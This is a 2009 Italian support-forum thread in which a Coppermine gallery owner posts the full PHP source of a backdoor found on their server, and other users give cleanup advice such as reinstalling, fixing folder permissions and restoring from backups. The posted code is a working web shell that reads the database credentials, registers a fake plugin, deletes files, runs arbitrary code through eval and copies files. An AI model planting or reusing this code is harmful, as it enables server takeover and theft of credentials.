forum.coppermine-gallery.net
Support => Italian (Italiano) => Closed boards => Language Specific Support => cpg1.4.x Italian (Italiano) => Topic started by: XTChrys on February 21, 2009, 06:15:39 pm
-
Un saluto a tutta la community, scrivo questo post per avere chiarimenti su di un fatto che mi è accaduto poco tempo fa. Stavo caricando via ftp (uso Filezilla) alcune immagini, quando nella cartella "Album" trovo un file mai visto prima, con il nome "eca620cc3c082634e38a3ba890993fc0" che ho ovviamente rimosso dal server. Secondo voi mi devo preoccupare? Per ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker. Di seguito vi posto il codice php del file:
<?
$hash="eca620cc3c082634e38a3ba890993fc0";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash="eca620cc3c082634e38a3ba890993fc0";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>';
$codebase_str=str_replace("eca620cc3c082634e38a3ba890993fc0", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>
Vi ringrazio in anticipo!
-
Se la galleria e' stata infettata rimuovere il singolo file non serve.
L'unica cosa che ti puo' mettere al sicuro e' questa:
rinomina la root dove risiede coppermine, cosi' eviti altri eventuali danni e reinstalla da capo l'ultima versione.
-
Anzitutto quale versione utilizzi? Alcune possibili falle di sicurezza sono state recentemente scoperte e "colmate", l'ultima versione è la 1.4.20
-
Vi ringrazio per avermi risposto. La gallery è aggiornata all'ultima versione 1.4.20. Quindi come mi dovrei comportare? Non c'è un altro modo senza dover cambiare la root della gallery? ???
-
Hai possibilità di leggere il log del tuo sito? Prima di gridare al lupo (o, meglio, all'hacker!) sarebbe interessante poter capire quale sia stata l'attività sul sito. Continuo a pensare al file che hai trovato, come ad un temporaneo, magari un trasferimento andato male o qualcosa del genere.
Se hai la possibilità di avere il log faccelo avere: se di hacking si tratta (o tentativo di hacking) è importante, per il bene di tutte le gallerie, capire cosa è successo e trovare soluzioni.
-
Il mio sito è hostato su Aruba, che sia un errore di trasferimento di Filezilla, non saprei. Per sicurezza ho aperto un ticket in assistenza chiedendo la modifica della password del mio database MySql e ho cancellato tutti i file della mia galleria (eccetto il config.inc.php e la cartella album) sostituendoli con quelli del pacchetto "Coppermine". Secondo voi ho fatto bene?
Per quanto riguarda invece la lettura del log non credo che Aruba lo permetta in quanto non sono riuscito a trovare questa funzione nel pannello di amministrazione.
-
Per ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker.
Timori fondati, vedi qui (http://forum.coppermine-gallery.net/index.php/topic,57931.0.html) un caso identico...e segui gli accorgimenti ivi suggeriti.
La falla è senz'altro precedente l'upgrade alla versione 1.4.20 (se hai avuto spirito da "hackerbuster" avrai senz'altro conservato il file, o preso nota della data 8) ), quindi IMHO con una disinstallazione e reinstallazione completa sei a posto. Raccomando anch'io di impostare i permessi della cartella /albums e relative a sottocartelle a 755 anzichè 777: Coppermine funziona ugualmente.
-
Grazie Ludo! Purtroppo è come temevo. :-[ Siccome la mia gallery conta quasi 14.000 file e non vorrei perdere tutto il lavoro svolto, volevo sapere se una reinstallazione mi cancellerebbe tutto, oppure c'è un modo meno "aggressivo" per risolvere? Grazie per tutto il tempo che avete perso ad aiutarmi. :)
-
La reinstallazione, come l'installazione, non riguarda la cartella /albums (salvo pulizia), ma solo i core files (più eventuali plugin e mod aggiornati).
Per facilitare la pulizia della cartella albums, puoi lanciare uno scandir() ricorsivo che cerchi ed elimini i file con estensione diversa da quelli immagine e video...
-
io ho già eliminato tutti i file di coppermine eccetto la cartella album e config.inc.php con quelli "puliti" presenti nell'archivio del pacchetto di installazione. E' questo che intendevi dire? Scusami ma è la prima volta che mi accade una cosa del genere.
Lo scandir() come si esegue?
-
Sì, intendevo esattamente quello, avendo l'accortezza di eliminare prima tutte le cartelle della vecchia installazione e poi ricaricarle interamente, così da rimuovere eventuali file ambigui.
Per scandir intendevo uno script in PHP che scorra le cartelle a partire da /albums e controlli la presenza di files non previsti, non essendo qui possibile eliminare la cartella.
-
Ok, grazie mille per l'aiuto, siete stati gentilissimi ora posso stare tranquillo. :)
-
Ciao a tutti!!
Scusate se mi intrometto ma , per mia imperdonabile negligenza non avendo aggiornato coppermine da circa un anno sono caduto in un sicuro attacco .... sono "sparite tutte le foto", nel senso che sono per fortuna ancora presenti nelle directory, che ho provveduto a salvare completamente, ma sono saltati tutti i link....
Nella cartella albums ho un file 03d667ca.php e uno 9.php ......
Cosa è successo?
Immagino non sia sufficente aggiornare coppermine ora..... mi rimane la cancellazione totale e reinstallazione o c'è un metodo piu indolore???
Se volete dare un'occhiata la gallery menomata la trovate su www.imbriaeghidozena.com/foto/index.php .....
Vi ringrazio anticipatamente ....
Ciao a tutti
-
Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....
-
Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....
Se spieghi come/cosa hai fatto, potrebbe essere d'aiuto anche ad altri è lo spirito del forum ;-)
-
Si chiedo scusa....
non ho fatto nulla di che... dopo aver rimosso 1 file che mi era apparso nella cartella album ho semplicemente guardato che file fossero stati modificati il giorno dell'attacco e li ho ripresi da un backup di qualche tempo fa.... ora non sono a casa, quando apro il mio pc scrivo i nomi dei file che erano stati attaccati...
Ciao a tutti..